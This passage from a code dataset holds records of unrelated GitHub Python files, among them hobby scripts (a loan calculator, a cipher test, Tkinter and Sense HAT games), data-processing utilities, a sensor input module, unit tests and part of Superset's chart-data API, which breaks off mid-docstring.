print(\"invalid option Try Again\".center(120,\"*\"))\n loan()\n op=input(\"DO you want to continue \").strip().lower()\n if op=='yes':\n start()\n else:\n exit()\n\n\n\ndef govt(acn):\n clear(\"Loan\")\n data=get_data()\n if data[acn]['loan']!=0:\n load()\n clear(\"Loan\")\n print(\"Loan is already granted:- \".center(120,\"*\"))\n start()\n clear(\"loan\")\n salary=int(input(\"what is your monthly salary:- \"))\n pay_slip=''\n while pay_slip!='yes' and pay_slip!='no':\n pay_slip=input(\"Do yo have pay slip(Yes/no):- \").strip().lower()\n if pay_slip!='yes' and pay_slip!='no':\n print(\" please answer in Yes/No \")\n load()\n clear(\"Loan\")\n if pay_slip==\"no\":\n clear(\"Loan\")\n print(\" You are not eligible for a loan without pay slip \")\n load()\n load()\n start()\n if salary<20000:\n clear(\"Loan\")\n print(\" You are not eligible for a loan \")\n elif salary>=20000 and salary<50000:\n print(\"A loan of 100000 is Approved\")\n data[acn]['loan']=100000\n data[acn]['bal']+=100000\n elif salary>=50000 and salary<100000:\n print(\"A loan of 300000 is Approved\")\n data[acn]['loan']=200000\n data[acn]['bal']+=200000\n elif salary>=100000 and salary<500000:\n print(\"A loan of 400000 is Approved\")\n data[acn]['loan']=400000\n data[acn]['bal']+=400000\n elif salary>=500000:\n print(\"A loan of 1000000 is Approved\")\n data[acn]['loan']=1000000\n data[acn]['bal']+=1000000\n put_data(data)\n op=input(\"DO you want to continue \").strip().lower()\n if op=='yes':\n start()\n else:\n exit()\n\n\ndef pvt_emp(acn):\n clear(\"Loan\")\n data=get_data()\n if data[acn]['loan']!=0:\n load()\n clear(\"Loan\")\n print(\"A Loan is already Approved to you:- \")\n start()\n salary=int(input(\"what is your monthly salary:- \"))\n prop=''\n while prop!='yes' and prop!='no':\n clear(\"Loan\")\n prop=input(\"Loan can be granted againest property\\nAre you agree (Yes/no):- \").strip().lower()\n if prop!='yes' and prop!='no':\n print(\" please answer in Yes/No \")\n if prop==\"no\":\n clear(\"Loan\")\n print(\" Loan can not be Approved without property papers \")\n load()\n load()\n start()\n load()\n clear(\"Loan\")\n if salary<50000:\n print(\"You are not Eligible for loan\")\n elif salary>=50000 and salary<100000:\n print(\"A loan of 200000 is Approved\")\n data[acn]['loan']=200000\n data[acn]['bal']+=200000\n elif salary>=100000 and salary<300000:\n print(\"A loan of 300000 is Approved\")\n data[acn]['loan']=300000\n data[acn]['bal']+=300000\n elif salary>=300000:\n print(\"A loan of 500000 is Approved\")\n data[acn]['loan']=500000\n data[acn]['bal']+=500000\n put_data(data)\n op=input(\"DO you want to continue \").strip().lower()\n if op=='yes':\n start()\n else:\n exit()\n\n\ndef business(acn):\n clear(\"Loan\")\n data=get_data()\n if data[acn]['loan']!=0:\n load()\n clear(\"Loan\")\n print(\"Loan is already Approved to you:- \")\n load()\n load()\n start()\n salary=int(input(\"what is your monthly salary:- \"))\n ITR=''\n while ITR!='yes' and ITR!='no':\n ITR=input(\"Do you have GST number (Yes/no):- \").strip().lower()\n if ITR!='yes' and ITR!='no':\n print(\" please answer in Yes/No \")\n if ITR==\"no\":\n load()\n clear(\"Loan\")\n print(\"Loan can not be Approved without GST Number\")\n else:\n clear(\"Loan\")\n if salary<50000:\n print(\"You are not Eligible for Loan\")\n elif salary>=50000 and salary<100000:\n print(\"A loan of 50000 is Approved\")\n data[acn]['loan']=50000\n data[acn]['bal']+=50000\n elif salary>=100000 and salary<300000:\n print(\"A loan of 120000 is Approved\")\n data[acn]['loan']=120000\n data[acn]['bal']+=120000\n elif salary>=300000:\n print(\"A loan of 500000 is Approved\")\n data[acn]['loan']=500000\n data[acn]['bal']+=500000\n put_data(data)\n op=input(\"DO you want to continue \").strip().lower()\n if op=='yes':\n start()\n else:\n exit()\n\ndef start():\n loan()\nstart()","repo_name":"Peeyush-B/Python","sub_path":"Bank/Loan().py","file_name":"Loan().py","file_ext":"py","file_size_in_byte":6354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4641717640","text":"import encryptTransposition\nimport decryptTransposition\nimport sys\nimport random\n\ndef main():\n random.seed(42)\n for i in range(20):\n message='QWERTYUIOPASDFGHJKLZXCVBNM'*random.randint(4,40)\n message=list(message)\n random.shuffle(message)\n message=''.join(message)\n print('Test #%s: \"%s...\" '%(i+1, message))\n for key in range(1,int(len(message)/2)):\n encrypted=encryptTransposition.encryptMessage(key,message)\n decrypted=decryptTransposition.decryptMessage(key,message)\n if message !=decrypted:\n print('Mismatch with key %s and message %s '%(key, message))\n print('Decrypted as '+decrypted)\n sys.exit\n print('Transposition cipher test passed')\n\n\nmain()\n","repo_name":"kangliewbei128/sturdy-siamese","sub_path":"transpositionTest.py","file_name":"transpositionTest.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4479306139","text":"# # first class functions just mean that functions are variables\n# def divide(dividend, divisor):\n# if divisor == 0:\n# raise ZeroDivisionError(\"Divisor cannot be 0.\")\n#\n# return dividend / divisor\n#\n#\n# def calculate(*values, operator):\n# return operator(*values)\n#\n#\n# # divide here is a first class function because it's being passed in to calculate\n# result = calculate(20, 4, operator=divide)\n# print(result)\n\nfrom operator import itemgetter\n\n\ndef search(sequence, expected, finder):\n for elem in sequence:\n if finder(elem) == expected:\n return elem\n raise RuntimeError(f\"Could not find an element with {expected}\")\n\n\nfriends = [\n {\"name\": \"Rolf Smith\", \"age\": 24},\n {\"name\": \"Adam Wool\", \"age\": 30},\n {\"name\": \"Anne Pun\", \"age\": 27}\n]\n\n\ndef get_friend_name(friend):\n return friend[\"name\"]\n\n\n# print(search(friends, \"Bob Smith\", get_friend_name))\n# print(search(friends, \"Bob Smith\", lambda friend: friend[\"name\"]))\nprint(search(friends, \"Bob Smith\", itemgetter(\"name\")))","repo_name":"Bjcurty/PycharmProjects","sub_path":"Python-Refresher/33_first_class_functions/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20017020517","text":"import sys\nimport csv\nimport frontmatter\n\ndef dictinsert(key, source, d, input):\n if source in input:\n if input[source] != False:\n d[key] = input[source]\n else:\n d[key] = ''\n else:\n d[key] = ''\n\ndef strip(x):\n return x.strip()\n \nif len(sys.argv) < 2:\n print(\"Usage: \")\n sys.exit(-1)\n \nfname = sys.argv[1]\nsyllabus = frontmatter.load(fname)\ncsvfile = open(fname + '.csv', 'w')\nfieldnames = [\"Week\", \"Day\", \"Title\", \"Link\", \"dtitle1\", \"dlink1\", \"dpoints1\", \"drubric1\", \"dtype1\", \"dtitle2\", \"dlink2\", \"dpoints2\", \"drubric2\", \"dtype2\", \"dtitle3\", \"dlink3\", \"dpoints3\", \"drubric3\", \"dtype3\", \"rtitle1\", \"rlink1\", \"rtitle2\", \"rlink2\", \"rtitle3\", \"rlink3\", \"rtitle4\", \"rlink4\", \"rtitle5\", \"rlink5\"]\ncsvwriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\ncsvwriter.writeheader()\n\nfor day in syllabus['schedule']:\n row = dict()\n \n dictinsert('Week', 'week', row, day)\n dictinsert('Day', 'date', row, day)\n dictinsert('Title', 'title', row, day)\n dictinsert('Link', 'link', row, day)\n \n if 'deliverables' in day:\n dcount = 1\n for deliverable in day['deliverables']:\n dictinsert('dtitle' + str(dcount), 'dtitle', row, deliverable)\n dictinsert('dlink' + str(dcount), 'dlink', row, deliverable)\n dictinsert('dpoints' + str(dcount), 'points', row, deliverable)\n dictinsert('dtype' + str(dcount), 'submission_types', row, deliverable)\n dictinsert('drubric' + str(dcount), 'rubricpath', row, deliverable)\n \n dcount += 1\n \n if dcount > 3:\n break\n else:\n for i in range(3):\n row['dtitle' + str(i+1)] = ''\n row['dlink' + str(i+1)] = ''\n row['dpoints' + str(i+1)] = ''\n row['drubric' + str(i+1)] = ''\n row['dtype' + str(i+1)] = ''\n \n if 'readings' in day:\n rcount = 1\n for reading in day['readings']:\n dictinsert('rtitle' + str(rcount), 'rtitle', row, reading)\n dictinsert('rlink' + str(rcount), 'rlink', row, reading)\n \n rcount += 1\n \n if rcount > 5:\n break\n else:\n for i in range(5):\n row['rtitle' + str(i+1)] = ''\n row['rlink' + str(i+1)] = ''\n \n csvwriter.writerow(row)\n \ncsvfile.close()\n","repo_name":"BillJr99/Ursinus-Boilerplate-Code","sub_path":"course/syllabus_markdown_table_generator/markdown-to-csv.py","file_name":"markdown-to-csv.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71766653955","text":"# coding=utf-8\nimport copy\nfrom flask_babel import lazy_gettext\n\nfrom mycodo.inputs.base_input import AbstractInput\nfrom mycodo.inputs.sensorutils import calculate_dewpoint\nfrom mycodo.inputs.sensorutils import calculate_vapor_pressure_deficit\n\n# Measurements\nmeasurements_dict = {\n 0: {\n 'measurement': 'temperature',\n 'unit': 'C'\n },\n 1: {\n 'measurement': 'humidity',\n 'unit': 'percent'\n },\n 2: {\n 'measurement': 'dewpoint',\n 'unit': 'C'\n },\n 3: {\n 'measurement': 'vapor_pressure_deficit',\n 'unit': 'Pa'\n }\n}\n\n# Input information\nINPUT_INFORMATION = {\n 'input_name_unique': 'HTU21D_CIRCUITPYTHON',\n 'input_manufacturer': 'TE Connectivity',\n 'input_name': 'HTU21D',\n 'input_library': 'Adafruit_CircuitPython_HTU21D',\n 'measurements_name': 'Humidity/Temperature',\n 'measurements_dict': measurements_dict,\n 'url_manufacturer': 'https://www.te.com/usa-en/product-CAT-HSC0004.html',\n 'url_datasheet': 'https://www.te.com/commerce/DocumentDelivery/DDEController?Action=showdoc&DocId=Data+Sheet%7FHPC199_6%7FA6%7Fpdf%7FEnglish%7FENG_DS_HPC199_6_A6.pdf%7FCAT-HSC0004',\n 'url_product_purchase': 'https://www.adafruit.com/product/1899',\n\n 'options_enabled': [\n 'i2c_location',\n 'measurements_select',\n 'period',\n 'pre_output'\n ],\n 'options_disabled': ['interface'],\n\n 'dependencies_module': [\n (\"pip-pypi\", \"adafruit_extended_bus\", \"Adafruit-extended-bus==1.0.2\"),\n (\"pip-pypi\", \"adafruit_htu21d\", \"adafruit-circuitpython-HTU21D==0.11.0\"),\n ],\n\n 'interfaces': ['I2C'],\n 'i2c_location': ['0x40'],\n 'i2c_address_editable': False,\n\n 'custom_options': [\n {\n 'id': 'temperature_offset',\n 'type': 'float',\n 'default_value': 0.0,\n 'required': True,\n 'name': lazy_gettext(\"Temperature Offset\"),\n 'phrase': \"The temperature offset (degrees Celsius) to apply\"\n }\n ]\n}\n\n\nclass InputModule(AbstractInput):\n \"\"\"\n A sensor support class that measures the HTU21D's humidity and temperature\n and calculates the dew point\n \"\"\"\n def __init__(self, input_dev, testing=False):\n super().__init__(input_dev, testing=testing, name=__name__)\n\n self.sensor = None\n self.i2c_address = 0x40 # HTU21D-F Address\n\n self.temperature_offset = None\n\n if not testing:\n self.setup_custom_options(\n INPUT_INFORMATION['custom_options'], input_dev)\n self.try_initialize()\n\n def initialize(self):\n import adafruit_htu21d\n from adafruit_extended_bus import ExtendedI2C\n\n self.sensor = adafruit_htu21d.HTU21D(\n ExtendedI2C(self.input_dev.i2c_bus),\n address=self.i2c_address,\n )\n\n def get_measurement(self):\n \"\"\"Gets the humidity and temperature\"\"\"\n if not self.sensor:\n self.logger.error(\"Error 101: Device not set up. See https://kizniche.github.io/Mycodo/Error-Codes#error-101 for more info.\")\n return None\n\n self.return_dict = copy.deepcopy(measurements_dict)\n\n if self.is_enabled(0):\n self.value_set(0, self.sensor.temperature + self.temperature_offset)\n\n if self.is_enabled(1):\n self.value_set(1, self.sensor.relative_humidity)\n\n if self.is_enabled(2) and self.is_enabled(0) and self.is_enabled(1):\n self.value_set(2, calculate_dewpoint(self.value_get(0), self.value_get(1)))\n\n if self.is_enabled(3) and self.is_enabled(0) and self.is_enabled(1):\n self.value_set(3, calculate_vapor_pressure_deficit(self.value_get(0), self.value_get(1)))\n\n return self.return_dict\n","repo_name":"kizniche/Mycodo","sub_path":"mycodo/inputs/htu21d_circuitpython.py","file_name":"htu21d_circuitpython.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"}
+{"seq_id":"8417347779","text":"import Tkinter\r\nimport random\r\nbg = ['Red','Aqua','Blue','cyan','teal','Green','Pink','Black','Yellow','Orange','White','Purple','Brown']\r\nscore=0\r\ntimeleft=10\r\n\r\ndef startGame(event):\r\n\r\n \r\n if timeleft == 10:\r\n \r\n countdown()\r\n \r\n nextColour()\r\ndef nextColour():\r\n global score\r\n global timeleft\r\n timeleft =10\r\n if timeleft > 0:\r\n e.focus_set()\r\n if e.get().lower() == bg[1].lower():\r\n score += 1\r\n timeLabel.config(text=\"Time left: \" + str(timeleft))\r\n e.delete(0, Tkinter.END)\r\n random.shuffle(bg)\r\n label.config(fg=str(bg[1]), text=str(bg[0]))\r\n \r\n scoreLabel.config(text=\"Score: \" + str(score)) \r\ndef countdown():\r\n\r\n \r\n global timeleft\r\n if timeleft > 0: \r\n timeleft -= 1\r\n timeLabel.config(text=\"Time left: \" + str(timeleft))\r\n timeLabel.after(1000, countdown)\r\n else:\r\n timeLabel.config(text=\"Time UP!!!!\")\r\n e.config(state='disabled')\r\nroot = Tkinter.Tk()\r\nroot.title(\"Color Game\")\r\nroot.geometry(\"400x250\")\r\ninstructions = Tkinter.Label(root, text=\"Type Colour Name,Not Word Text!\", font=('Bold', 12))\r\ninstructions.pack()\r\nscoreLabel = Tkinter.Label(root, text=\"Press enter to start\", font=('Bold', 12))\r\nscoreLabel.pack()\r\ntimeLabel = Tkinter.Label(root, text=\"Time left: \" + str(timeleft), font=('Bold', 12))\r\ntimeLabel.pack()\r\nlabel = Tkinter.Label(root, font=('Bold', 70))\r\nlabel.pack()\r\n\r\ne = Tkinter.Entry(root)\r\nroot.bind('', startGame)\r\ne.pack()\r\ne.focus_set()\r\nroot.mainloop()\r\n","repo_name":"gaurav112007/Color-game","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37241720038","text":"import csv\nimport json\n\ndef process_data(cur_split):\n # load raw text\n with open(f\"./data/raw/QuALITY.v1.0.1.htmlstripped.{cur_split}\", \"r\") as f:\n data = f.readlines()\n data = [json.loads(x) for x in data]\n\n # extract questions\n ret = []\n cnter = 0\n for item in data:\n article_id = item['article_id']\n for q in item['questions']:\n question = q['question']\n options = q['options']\n gold_label = q['gold_label']\n assert len(options) == 4\n q_item = {\n 'qid': cnter,\n 'article_id' : article_id,\n 'question' : question,\n 'option_1' : options[0],\n 'option_2' : options[1],\n 'option_3' : options[2],\n 'option_4' : options[3],\n 'gold_label' : gold_label,\n }\n ret.append(q_item)\n cnter += 1\n\n with open(f\"./data/processed/quality_{cur_split}_q.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=['qid', 'article_id', 'question', 'option_1',\n 'option_2', 'option_3', 'option_4', 'gold_label'])\n writer.writeheader()\n writer.writerows(ret)\n\nif __name__ == \"__main__\":\n process_data(\"train\")\n process_data(\"dev\")","repo_name":"SimengSun/pearl","sub_path":"data_preproc.py","file_name":"data_preproc.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"61"}
+{"seq_id":"2033345629","text":"import unittest\nfrom unittest.mock import MagicMock, patch\nfrom app.test.base import BaseTestCase\nfrom app.main.util.event_processor import build_event_processor, StartEvent, SchemaValidationError\n\nclass TestEventProcessor(BaseTestCase):\n\n def test_start_event_deserialization(self):\n payload = {\n \"event_type\": \"start\",\n \"message_id\": \"061371f1-eda5-4fea-96ee-436a6dd4f8d7\",\n \"message_at\": \"2018-09-21T18:04:55+00:00\",\n \"event_at\": \"2018-09-21T18:03:55+00:00\",\n \"match_id\": \"ef4146ee-64e3-430b-b6af-b12671e4beef\",\n \"location\": \"toronto\",\n \"team_1\": \"Toronto\",\n \"team_2\": \"Montreal\"\n }\n event = StartEvent(payload)\n result = event.deserialize()\n self.assertEquals(result.errors, {})\n\n def test_start_event_deserialization_error(self):\n payload = {\n \"event_type\": \"start\",\n \"message_id\": \"061371f1-eda5-4fea-96ee-436a6dd4f8d7\",\n }\n event = StartEvent(payload)\n self.assertRaises(SchemaValidationError, event.deserialize)\n\n @patch('app.main.util.event_processor.Kafka')\n def test_publish_to_kafka(self, mock_kafka):\n payload = {\n \"event_type\": \"start\",\n \"message_id\": \"061371f1-eda5-4fea-96ee-436a6dd4f8d7\",\n \"message_at\": \"2018-09-21T18:04:55+00:00\",\n \"event_at\": \"2018-09-21T18:03:55+00:00\",\n \"match_id\": \"ef4146ee-64e3-430b-b6af-b12671e4beef\",\n \"location\": \"toronto\",\n \"team_1\": \"Toronto\",\n \"team_2\": \"Montreal\"\n }\n event = StartEvent(payload)\n event.process()\n mock_kafka.return_value.publish_event.assert_called()\n\nclass TestBuildEventProcessor(BaseTestCase):\n\n def test_start_event_creation(self):\n payload = {\n \"event_type\": \"start\",\n \"message_id\": \"061371f1-eda5-4fea-96ee-436a6dd4f8d7\",\n \"message_at\": \"2018-09-21T18:04:55+00:00\",\n \"event_at\": \"2018-09-21T18:03:55+00:00\",\n \"match_id\": \"ef4146ee-64e3-430b-b6af-b12671e4beef\",\n \"location\": \"toronto\",\n \"team_1\": \"Toronto\",\n \"team_2\": \"Montreal\"\n }\n event = build_event_processor(payload)\n self.assertTrue(isinstance(event, StartEvent))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"harneksidhu/programming_challenges","sub_path":"swift_medical/event_splitter/app/test/test_event_processor.py","file_name":"test_event_processor.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39575391944","text":"from __future__ import annotations\n\nimport attrs\nimport torch\nfrom typeguard import typechecked\n\nfrom zetta_utils import builder, convnet, tensor_ops\n\n\n@builder.register(\"SimpleInferenceRunner\")\n@attrs.mutable\n@typechecked\nclass SimpleInferenceRunner: # pragma: no cover\n # Don't create the model during initialization for efficient serialization\n model_path: str\n unsqueeze_to: int | None = None\n\n def __call__(self, src: torch.Tensor) -> torch.Tensor:\n if torch.cuda.is_available():\n device = \"cuda\"\n else:\n device = \"cpu\"\n\n # load model during the call _with caching_\n model = convnet.utils.load_model(self.model_path, device=device, use_cache=True)\n if self.unsqueeze_to is not None:\n src = tensor_ops.unsqueeze_to(src, self.unsqueeze_to)\n result = model(src.to(device))\n return result\n","repo_name":"ZettaAI/zetta_utils","sub_path":"zetta_utils/convnet/simple_inference_runner.py","file_name":"simple_inference_runner.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"}
+{"seq_id":"13474908369","text":"import os\nfrom flightmap.csvstore import csvstore\nfrom geopy import distance\nfrom rtree import index\n\n_here=os.path.split(__file__)[0]\n\n\nstore=csvstore(os.path.join(_here,\"data/openflights.airports.csv\"))\nidx=index.Index()\n\n\nfor airport in store.data :\n bbox=list([float(a) for a in [airport[\"lng\"],airport[\"lat\"],airport[\"lng\"],airport[\"lat\"]]])\n aid=int(airport[\"nr\"])\n idx.insert(aid,bbox,obj=airport)\n\n\ndef nearest_airport(lng,lat) :\n lat=float(lat)\n lng=float(lng)\n nearest=[a.object for a in idx.nearest((lng,lat,lng,lat),objects=True)]\n for airport in nearest :\n fp=(float(airport[\"lat\"]),float(airport[\"lng\"]))\n airport[\"distance\"]=distance.distance((lat,lng),fp).km\n return nearest\n\n\nif __name__=='__main__' :\n\ttests=(((8.64,52.03),\"Bielefeld\"),\n\t\t ((9.3389,54.3223),\"Hohn\" ))\n\t\t \n\tfor (p,t) in tests :\n\t\tassert(nearest_airport(*p)[0][\"town\"]==t)\n\n\tassert(nearest_airport(8.64,52.03)[0][\"town\"]==\"Bielefeld\")\n","repo_name":"mvtango/flightmap","sub_path":"bin/flightmap/airportlocator.py","file_name":"airportlocator.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38560648494","text":"class Biblioteca:\n def __init__(self, _libros):\n self.libros = _libros\n\n #mostrar libros\n def mostrarLibros(self):\n for libro in self.libros:\n print(libro)\n\n def prestarLibros(self, nombreLibros):\n #verificar si el libro existe\n if nombreLibros in self.libros:\n print(\"Se presto el libro\", nombreLibros)\n self.libros.remove(nombreLibros)\n else:\n print(\"El libro no existe\")\n\n def agregarLibro(self, nombreLibros):\n #verificar que no exista\n if nombreLibros not in self.libros:\n print(\"Se añadio el libro\", nombreLibros)\n self.libros.append(nombreLibros)\n else:\n print(\"El libro ya existe\")\n\n\nlibros = [\"Clean Code\", \"Java\", \"Analisis\"]\n\nbiblioteca = Biblioteca(libros)\n\nwhile True:\n print(\"1) Agregar libro\")\n print(\"2) Presentar libro\")\n print(\"3) Mostrar libro\")\n print(\"4) Salir\")\n\n opcion = int(input(\"Ingres un opcion(1-4)\"))\n\n if opcion == 1:\n libro = input(\"\\nIngresa el nombre del libro\")\n biblioteca.agregarLibro(libro)\n elif opcion == 2:\n libro = input(\"\\nIngresa el nombre del libro\")\n biblioteca.prestarLibros(libro)\n elif opcion == 3:\n print(\"\\nMis libros son\")\n biblioteca.MostrarLibros(libro)\n elif opcion == 4:\n break","repo_name":"AlvinRHD/Practica_Estructura6","sub_path":"ejercicio0.py","file_name":"ejercicio0.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74953373955","text":"from sense_hat import SenseHat\nfrom time import sleep\nfrom emojis.smile import Smile\nfrom emojis.frown import Frown\nfrom emojis.neutral import Neutral\n\nclass AnimatedEmoji:\n \n def __init__(self, color1, color2, color3):\n self.__color1 = color1\n self.__color2 = color2\n self.__color3 = color3\n\n def aEmoji(self):\n sense = SenseHat()\n sense.clear()\n\n color1 = self.__color1\n color2 = self.__color2\n color3 = self.__color3\n\n emojis = [\n Smile(color1),\n Neutral(color2),\n Frown(color3)\n ]\n\n while True:\n for emoji in emojis:\n sense.set_pixels(emoji.face())\n sleep(3)\n\nr = (255, 0, 0)\ny = (255, 255, 0)\ng = (0, 255, 0)\n\ne1 = AnimatedEmoji(g, y, r)\ne1.aEmoji() ","repo_name":"ddhuy77/COSC2790_PIoT_Assignment_1","sub_path":"animatedEmoji.py","file_name":"animatedEmoji.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25165562225","text":"from __future__ import annotations\n\nimport contextlib\nimport json\nimport logging\nfrom typing import Any, TYPE_CHECKING\n\nimport simplejson\nfrom flask import current_app, g, make_response, request, Response\nfrom flask_appbuilder.api import expose, protect\nfrom flask_babel import gettext as _\nfrom marshmallow import ValidationError\n\nfrom superset import is_feature_enabled, security_manager\nfrom superset.async_events.async_query_manager import AsyncQueryTokenException\nfrom superset.charts.api import ChartRestApi\nfrom superset.charts.data.query_context_cache_loader import QueryContextCacheLoader\nfrom superset.charts.post_processing import apply_post_process\nfrom superset.charts.schemas import ChartDataQueryContextSchema\nfrom superset.commands.chart.data.create_async_job_command import (\n CreateAsyncChartDataJobCommand,\n)\nfrom superset.commands.chart.data.get_data_command import ChartDataCommand\nfrom superset.commands.chart.exceptions import (\n ChartDataCacheLoadError,\n ChartDataQueryFailedError,\n)\nfrom superset.common.chart_data import ChartDataResultFormat, ChartDataResultType\nfrom superset.connectors.sqla.models import BaseDatasource\nfrom superset.daos.exceptions import DatasourceNotFound\nfrom superset.exceptions import QueryObjectValidationError\nfrom superset.extensions import event_logger\nfrom superset.models.sql_lab import Query\nfrom superset.utils.core import create_zip, get_user_id, json_int_dttm_ser\nfrom superset.views.base import CsvResponse, generate_download_headers, XlsxResponse\nfrom superset.views.base_api import statsd_metrics\n\nif TYPE_CHECKING:\n from superset.common.query_context import QueryContext\n\nlogger = logging.getLogger(__name__)\n\n\nclass ChartDataRestApi(ChartRestApi):\n include_route_methods = {\"get_data\", \"data\", \"data_from_cache\"}\n\n @expose(\"//data/\", methods=(\"GET\",))\n @protect()\n @statsd_metrics\n @event_logger.log_this_with_context(\n action=lambda self, *args, **kwargs: f\"{self.__class__.__name__}.data\",\n log_to_statsd=False,\n )\n def get_data(self, pk: int) -> Response:\n \"\"\"\n Take a chart ID and uses the query context stored when the chart was saved\n to return payload data response.\n ---\n get:\n summary: Return payload data response for a chart\n description: >-\n Takes a chart ID and uses the query context stored when the chart was saved\n to return payload data response.\n parameters:\n - in: path\n schema:\n type: integer\n name: pk\n description: The chart ID\n - in: query\n name: format\n description: The format in which the data should be returned\n schema:\n type: string\n - in: query\n name: type\n description: The type in which the data should be returned\n schema:\n type: string\n - in: query\n name: force\n description: Should the queries be forced to load from the source\n schema:\n type: boolean\n responses:\n 200:\n description: Query result\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataResponseSchema\"\n 202:\n description: Async job details\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataAsyncResponseSchema\"\n 400:\n $ref: '#/components/responses/400'\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n chart = self.datamodel.get(pk, self._base_filters)\n if not chart:\n return self.response_404()\n\n try:\n json_body = json.loads(chart.query_context)\n except (TypeError, json.decoder.JSONDecodeError):\n json_body = None\n\n if json_body is None:\n return self.response_400(\n message=_(\n \"Chart has no query context saved. Please save the chart again.\"\n )\n )\n\n # override saved query context\n json_body[\"result_format\"] = request.args.get(\n \"format\", ChartDataResultFormat.JSON\n )\n json_body[\"result_type\"] = request.args.get(\"type\", ChartDataResultType.FULL)\n json_body[\"force\"] = request.args.get(\"force\")\n\n try:\n query_context = self._create_query_context_from_form(json_body)\n command = ChartDataCommand(query_context)\n command.validate()\n except DatasourceNotFound:\n return self.response_404()\n except QueryObjectValidationError as error:\n return self.response_400(message=error.message)\n except ValidationError as error:\n return self.response_400(\n message=_(\n \"Request is incorrect: %(error)s\", error=error.normalized_messages()\n )\n )\n\n # TODO: support CSV, SQL query and other non-JSON types\n if (\n is_feature_enabled(\"GLOBAL_ASYNC_QUERIES\")\n and query_context.result_format == ChartDataResultFormat.JSON\n and query_context.result_type == ChartDataResultType.FULL\n ):\n return self._run_async(json_body, command)\n\n try:\n form_data = json.loads(chart.params)\n except (TypeError, json.decoder.JSONDecodeError):\n form_data = {}\n\n return self._get_data_response(\n command=command, form_data=form_data, datasource=query_context.datasource\n )\n\n @expose(\"/data\", methods=(\"POST\",))\n @protect()\n @statsd_metrics\n @event_logger.log_this_with_context(\n action=lambda self, *args, **kwargs: f\"{self.__class__.__name__}.data\",\n log_to_statsd=False,\n )\n def data(self) -> Response:\n \"\"\"\n Take a query context constructed in the client and return payload\n data response for the given query\n ---\n post:\n summary: Return payload data response for the given query\n description: >-\n Takes a query context constructed in the client and returns payload data\n response for the given query.\n requestBody:\n description: >-\n A query context consists of a datasource from which to fetch data\n and one or many query objects.\n required: true\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataQueryContextSchema\"\n responses:\n 200:\n description: Query result\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataResponseSchema\"\n 202:\n description: Async job details\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataAsyncResponseSchema\"\n 400:\n $ref: '#/components/responses/400'\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n json_body = None\n if request.is_json:\n json_body = request.json\n elif request.form.get(\"form_data\"):\n # CSV export submits regular form data\n with contextlib.suppress(TypeError, json.JSONDecodeError):\n json_body = json.loads(request.form[\"form_data\"])\n if json_body is None:\n return self.response_400(message=_(\"Request is not JSON\"))\n\n try:\n query_context = self._create_query_context_from_form(json_body)\n command = ChartDataCommand(query_context)\n command.validate()\n except DatasourceNotFound:\n return self.response_404()\n except QueryObjectValidationError as error:\n return self.response_400(message=error.message)\n except ValidationError as error:\n return self.response_400(\n message=_(\n \"Request is incorrect: %(error)s\", error=error.normalized_messages()\n )\n )\n\n # TODO: support CSV, SQL query and other non-JSON types\n if (\n is_feature_enabled(\"GLOBAL_ASYNC_QUERIES\")\n and query_context.result_format == ChartDataResultFormat.JSON\n and query_context.result_type == ChartDataResultType.FULL\n ):\n return self._run_async(json_body, command)\n\n form_data = json_body.get(\"form_data\")\n return self._get_data_response(\n command, form_data=form_data, datasource=query_context.datasource\n )\n\n @expose(\"/data/\", methods=(\"GET\",))\n @protect()\n @statsd_metrics\n @event_logger.log_this_with_context(\n action=lambda self, *args, **kwargs: f\"{self.__class__.__name__}\"\n f\".data_from_cache\",\n log_to_statsd=False,\n )\n def data_from_cache(self, cache_key: str) -> Response:\n \"\"\"\n Take a query context cache key and return payload\n data response for the given query.\n ---\n get:\n summary: Return payload data response for the given query\n description: >-\n Takes a query context cache key and returns payload data\n response for the given query.\n parameters:\n - in: path\n schema:\n type: string\n name: cache_key\n responses:\n 200:\n description: Query result\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataResponseSchema\"\n 400:\n $ref: '#/components/responses/400'\n 401:\n $ref: '#/components/responses/401'\n 404:\n $ref: '#/components/responses/404'\n 422:\n $ref: '#/components/responses/422'\n 500:\n $ref: 